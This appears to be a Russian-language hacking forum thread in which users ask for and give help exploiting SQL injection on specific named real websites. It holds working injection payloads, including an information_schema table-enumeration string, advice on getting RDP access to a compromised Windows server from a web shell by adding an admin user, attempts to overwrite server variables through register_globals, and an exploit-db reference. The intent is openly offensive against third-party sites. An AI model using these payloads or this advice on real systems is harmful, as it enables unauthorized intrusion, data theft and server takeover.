Допустим у firewall ( outpost ) есть режим анонимности, когда он блокирует ICMP трафик, инет же работает)) Ты же не собираешься отправлять пакеты через ICMP туннель)
я уже разобрался ) --------- Как раскрутить sql-inj в поле для поиска, просто первый раз сталкиваюсь с этой проблемой
блин кто нит помогите раскрутит http://investorshub.advfn.com/boards/boards_moderated.asp?user=-177571'+order+by+1{ никак не могу составит правильный запрос
Как я уже сказал, запрос такой... К примеру такой: Code: SELECT * FROM `table` WHERE `field` IN ('$str')
Здравствуйте помогите пожалуйста с sql инъекцией http://kirovmag.ru/catalog/subcat6/index6.php?str=-2&gis=5 ничего в нете путевого ненашел! недели две себе уже жопу рву из за этого!
есть что то типа такого: PHP: <?php echo $_SERVER['DOCUMENT_ROOT']; ?> я непойму почему неполучаеться переобределить переменую, пробывал так index.php?_SERVER[DOCUMENT_ROOT]=qwerty register_globals стоит в положении On
Возможно ли подключиться к дедику по RDP имея веб шелл.? ОС win На все диски права админа имею Или как добавить нового пользоателя ?
да, можно. как добавить, куча статей в нете. Создает BAT файл и исполняешь его. Открыть RDP - это в реестре. Так же полно статей в нете.
По линку что ты дал немного нето. Это реально, я ж это непридумал сам. Реальные примеры в багтраках встречаються. Пример из реальной жизни: http://www.exploit-db.com/exploits/10421 в начале imagezoom.php PHP: require_once($_SERVER["DOCUMENT_ROOT"]."/cms_rc_frontend.php"); ......
так случилось такая ситуация. По GET запросу подбирал таблицы на опера типа: в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос. Как можно обходит этого или как увеличить число символов адресной строки для Opera?
попробуй отсылать данные каким нить стороним софтом или скриптом, так можно будет обойти ограничение со стороны клиента
---------------------------------------------------- +or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+Х+table_name+from+information_schema.tables))-- ---------------------------------------------------- подставляешь вместо X 1, потом 2 и т.д.
Code: http://wow.teletoria.ru/ACP2/index.php?modul=charedit Не могу найти где Проделать Инъекцию (( Code: Notice: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and (`account` = 3181) and (`online` = 0) LIMIT 1' at line 1 in /var/www/html/ACP2/modules/charedit.php on line 6 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/ACP2/modules/charedit.php on line 7 Вот код PHP: if (mysql_num_rows($res) == 0) { echo 'Not select character!'; } else { $cres = mysql_fetch_array($res); if (($cres['race'] == 1) or ($cres['race'] == 3) or ($cres['race'] == 4) or ($cres['race'] == 7) or ($cres['race'] == 11)) $char_race = 1; //Alliance if (($cres['race'] == 2) or ($cres['race'] == 5) or ($cres['race'] == 6) or ($cres['race'] == 8) or ($cres['race'] == 10)) $char_race = 2; //Horde $money = $cres['money']; $char_lvl = $cres['level'];
